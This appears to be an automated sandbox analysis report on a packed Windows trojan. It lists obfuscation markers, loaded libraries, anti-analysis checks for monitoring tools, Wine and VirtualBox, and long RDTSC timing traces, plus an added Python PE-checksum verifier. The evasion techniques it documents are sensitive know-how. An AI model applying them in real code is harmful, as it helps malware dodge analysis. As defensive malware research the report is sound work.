Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0063403C
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B48B0
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007441DA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00736A1A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0060232A
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00741BCA
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00713C62
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_005F043E
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00722CD1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0062DCB9
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00730D60
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00649D29
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00746D95
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0073E670
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00719E29
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074AF46
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_0074879A
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00394A60 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: nflvzldk ZLIB complexity 0.9946585036524712
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B3A50 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,1_2_003B3A50
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003ACAE0 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_003ACAE0
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\40PEVZBY.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | ReversingLabs: Detection: 42%
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1753088 > 1048576
Source: file.exe | Static PE information: Raw size of nflvzldk is bigger than: 0x100000 < 0x192200

              Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 1.2.file.exe.390000.0.unpack :EW;.rsrc:W;.idata :W; :EW;nflvzldk:EW;tlfgsqna:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;nflvzldk:EW;tlfgsqna:EW;.taggant:EW; (section rights of the memory dump vs the original file: the unnamed first section is E R on disk and E W once unpacked)
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_003B6390
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1b213e should be: 0x1b3d7d
Source: file.exe | Static PE information: section name: "" (unnamed)
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name: "" (unnamed)
Source: file.exe | Static PE information: section name: nflvzldk
Source: file.exe | Static PE information: section name: tlfgsqna
Source: file.exe | Static PE information: section name: .taggant
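The checksum line above ("real checksum: 0x1b213e should be: 0x1b3d7d", the "PE file contains an invalid checksum" signature) is the sandbox comparing the value stored in IMAGE_OPTIONAL_HEADER.CheckSum with one recomputed over the file. Recomputing it is a cheap triage check. The following Python is an added example, not part of the report or of Joe Sandbox: it implements the same summation as the Windows CheckSumMappedFile routine and runs it over a constructed 256-byte stand-in for a PE image (MZ stub, e_lfanew, PE signature, a deliberately wrong CheckSum). Run against the actual sample it is assumed to reproduce the two values quoted in the report. Caveat: a CheckSum of zero is common for unsigned user-mode binaries and is not by itself suspicious; a non-zero value that no longer matches means the file was modified after linking, here consistent with the packer that renamed the sections.

```python
import struct


def pe_checksum_offset(data: bytes) -> int:
    """File offset of IMAGE_OPTIONAL_HEADER.CheckSum.

    Layout: e_lfanew (at 0x3C) -> 4-byte PE signature -> 20-byte COFF header
    -> optional header, whose CheckSum field is at +0x40 for PE32 and PE32+.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    offset = e_lfanew + 4 + 20 + 0x40
    if offset % 4 or offset + 4 > len(data):
        raise ValueError("CheckSum field misaligned or outside the file")
    return offset


def compute_pe_checksum(data: bytes) -> int:
    """Recompute CheckSum the way imagehlp's CheckSumMappedFile does.

    Sum every little-endian dword except the CheckSum field itself, folding
    the carry whenever the sum exceeds 32 bits, fold the result to 16 bits,
    then add the unpadded file length.
    """
    skip = pe_checksum_offset(data) // 4
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i // 4 == skip:
            continue
        total += struct.unpack_from("<I", padded, i)[0]
        if total > 0xFFFFFFFF:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)


def stored_pe_checksum(data: bytes) -> int:
    """CheckSum as written in the header (what the report calls "real checksum")."""
    return struct.unpack_from("<I", data, pe_checksum_offset(data))[0]


def verify_pe_checksum(data: bytes) -> dict:
    stored, computed = stored_pe_checksum(data), compute_pe_checksum(data)
    return {"stored": stored, "computed": computed, "valid": stored == computed}


def fix_pe_checksum(data: bytes) -> bytes:
    """Return a copy with a correct CheckSum (the field is excluded from the sum,
    so writing it does not change the computed value)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, pe_checksum_offset(data), compute_pe_checksum(data))
    return bytes(buf)


def build_sample() -> bytes:
    """Constructed 256-byte stand-in for a PE image (not the analysed file):
    MZ stub, e_lfanew = 0x40, PE signature, and a deliberately wrong CheckSum."""
    buf = bytearray(256)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<I", buf, 0x40 + 4 + 20 + 0x40, 0x12345678)
    return bytes(buf)


SAMPLE = build_sample()

if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE
    result = verify_pe_checksum(data)
    print(f"stored 0x{result['stored']:x}, computed 0x{result['computed']:x}, "
          f"{'valid' if result['valid'] else 'MISMATCH'}")
```

For the constructed sample the only non-zero dwords are "MZ" (0x5A4D), e_lfanew (0x40) and "PE" (0x4550), so the folded sum is 0x9FDD and the checksum is 0x9FDD + 256 = 0xA0DD. Passing a file path as the first argument runs the same check on a real binary.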
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00842093 push 2E8BAA80h; mov dword ptr [esp], ebp (at 1_2_008420BF)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007D7062 push ebx; mov dword ptr [esp], 37FED661h (at 1_2_007D7099)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007D7062 push edi; mov dword ptr [esp], 6FFFD3C1h (at 1_2_007D70FD)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_007D7062 push esi; mov dword ptr [esp], edx (at 1_2_007D715E)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 441A6813h; mov dword ptr [esp], ebp (at 1_2_007458B2)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push edi; mov dword ptr [esp], ecx (at 1_2_007458F9)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 16E8D9CDh; mov dword ptr [esp], ebp (at 1_2_00745924)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 75011ABDh; mov dword ptr [esp], edi (at 1_2_00745B0B)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push eax; mov dword ptr [esp], 258A6113h (at 1_2_00745C24)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 2FE42D76h; mov dword ptr [esp], eax (at 1_2_00745C34)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push ebx; mov dword ptr [esp], 36075421h (at 1_2_00745CE8)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 68440814h; mov dword ptr [esp], ebp (at 1_2_00745CF7)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push ebx; mov dword ptr [esp], 597B6BBFh (at 1_2_00745D85)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push edx; mov dword ptr [esp], ebx (at 1_2_00745DB5)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 3A5E8B8Ch; mov dword ptr [esp], esi (at 1_2_00745DE0)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push edx; mov dword ptr [esp], 3D639466h (at 1_2_00745EA9)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push edi; mov dword ptr [esp], ebx (at 1_2_00745EE6)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push edi; mov dword ptr [esp], 711FDA71h (at 1_2_00745F49)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push edi; mov dword ptr [esp], 04750955h (at 1_2_00746005)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push 2FC42A91h; mov dword ptr [esp], ecx (at 1_2_0074601D)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push ebp; mov dword ptr [esp], esi (at 1_2_00746021)
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00745840 push esi; mov dword ptr [esp], eax (at 1_2_0074603E)
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebp; mov dword ptr [esp], 7DFF3AFFh1_2_00746089
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 42D6F273h; mov dword ptr [esp], eax1_2_007460A0
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], 00000000h1_2_0074616E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push eax; mov dword ptr [esp], ecx1_2_007461C9
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edx; mov dword ptr [esp], 5F6EF3E0h1_2_007461FD
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push edi; mov dword ptr [esp], 64B57B11h1_2_007462E4
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push ebx; mov dword ptr [esp], esi1_2_00746328
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 5C4D1604h; mov dword ptr [esp], ebx1_2_0074639E
              Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00745840 push 5C0D1BBBh; mov dword ptr [esp], ecx1_2_00746475
              Source: file.exeStatic PE information: section name: nflvzldk entropy: 7.9535417712183945

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_003B6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DF8C5 second address: 5DF8C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74FE7F second address: 74FE94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Bh 0x00000007 jg 00007F63C8B57C1Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75270D second address: 75275C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+122D1C60h], ecx 0x00000010 push 00000000h 0x00000012 mov esi, dword ptr [ebp+122D2F62h] 0x00000018 call 00007F63C8D82F49h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jmp 00007F63C8D82F56h 0x00000025 jmp 00007F63C8D82F54h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75275C second address: 7527AA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F63C8B57C18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F63C8B57C20h 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jo 00007F63C8B57C32h 0x0000001a jp 00007F63C8B57C2Ch 0x00000020 jmp 00007F63C8B57C26h 0x00000025 mov eax, dword ptr [eax] 0x00000027 push edi 0x00000028 jp 00007F63C8B57C1Ch 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7527AA second address: 7527B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp+04h], eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7527B8 second address: 7527BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7527BC second address: 7527C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752920 second address: 7529CF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 add dword ptr [ebp+122D1CA7h], edx 0x0000000f push 00000000h 0x00000011 jnc 00007F63C8B57C19h 0x00000017 push 12B62B16h 0x0000001c jnp 00007F63C8B57C22h 0x00000022 xor dword ptr [esp], 12B62B96h 0x00000029 or dword ptr [ebp+122D34BDh], edi 0x0000002f push 00000003h 0x00000031 push 00000000h 0x00000033 push esi 0x00000034 call 00007F63C8B57C18h 0x00000039 pop esi 0x0000003a mov dword ptr [esp+04h], esi 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc esi 0x00000047 push esi 0x00000048 ret 0x00000049 pop esi 0x0000004a ret 0x0000004b sub edi, dword ptr [ebp+122D2BE7h] 0x00000051 xor esi, dword ptr [ebp+122D2C67h] 0x00000057 push 00000000h 0x00000059 add dh, FFFFFF9Ah 0x0000005c push 00000003h 0x0000005e jmp 00007F63C8B57C1Fh 0x00000063 call 00007F63C8B57C19h 0x00000068 jg 00007F63C8B57C20h 0x0000006e jmp 00007F63C8B57C1Ah 0x00000073 push eax 0x00000074 push edi 0x00000075 push edi 0x00000076 jc 00007F63C8B57C16h 0x0000007c pop edi 0x0000007d pop edi 0x0000007e mov eax, dword ptr [esp+04h] 0x00000082 push edx 0x00000083 pushad 0x00000084 push edx 0x00000085 pop edx 0x00000086 push eax 0x00000087 push edx 0x00000088 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7529CF second address: 752A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F63C8D82F50h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jnl 00007F63C8D82F4Ah 0x00000018 push esi 0x00000019 pushad 0x0000001a popad 0x0000001b pop esi 0x0000001c pop eax 0x0000001d adc si, 1CA7h 0x00000022 lea ebx, dword ptr [ebp+124465BFh] 0x00000028 jno 00007F63C8D82F4Ch 0x0000002e xchg eax, ebx 0x0000002f jmp 00007F63C8D82F4Ch 0x00000034 push eax 0x00000035 push eax 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B11 second address: 752B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B15 second address: 752B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B1B second address: 752B35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B35 second address: 752B4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B4B second address: 752B7B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F63C8B57C28h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B7B second address: 752B81 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B81 second address: 752B90 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752B90 second address: 752BE7 instructions: 0x00000000 rdtsc 0x00000002 js 00007F63C8D82F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f jbe 00007F63C8D82F5Ch 0x00000015 jl 00007F63C8D82F56h 0x0000001b jmp 00007F63C8D82F50h 0x00000020 pop eax 0x00000021 jmp 00007F63C8D82F53h 0x00000026 lea ebx, dword ptr [ebp+124465CAh] 0x0000002c xor dword ptr [ebp+122D1B2Dh], edi 0x00000032 mov edx, dword ptr [ebp+122D2AB3h] 0x00000038 xchg eax, ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 752BE7 second address: 752BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 744CFD second address: 744D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F63C8D82F56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770CA1 second address: 770CA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770F6F second address: 770F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F63C8D82F46h 0x0000000a jmp 00007F63C8D82F55h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770F90 second address: 770FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F63C8B57C1Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770FA6 second address: 770FAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770FAA second address: 770FB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770FB0 second address: 770FD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F63C8D82F4Dh 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 je 00007F63C8D82F46h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770FD2 second address: 770FD8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 770FD8 second address: 770FF1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F54h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 771636 second address: 77163A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 771776 second address: 77177A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76860C second address: 76862A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F63C8B57C16h 0x0000000a jmp 00007F63C8B57C24h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74B876 second address: 74B87A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74B87A second address: 74B8A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F63C8B57C30h 0x0000000c jmp 00007F63C8B57C24h 0x00000011 jg 00007F63C8B57C16h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74B8A0 second address: 74B8BD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F63C8D82F53h 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F63C8D82F4Bh 0x0000000f jbe 00007F63C8D82F4Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77225C second address: 772264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77272B second address: 772732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 772732 second address: 772737 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 772737 second address: 772743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F63C8D82F46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 776409 second address: 77640F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 74316F second address: 743173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 743173 second address: 743192 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F63C8B57C23h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77DD15 second address: 77DD19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77DD19 second address: 77DD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
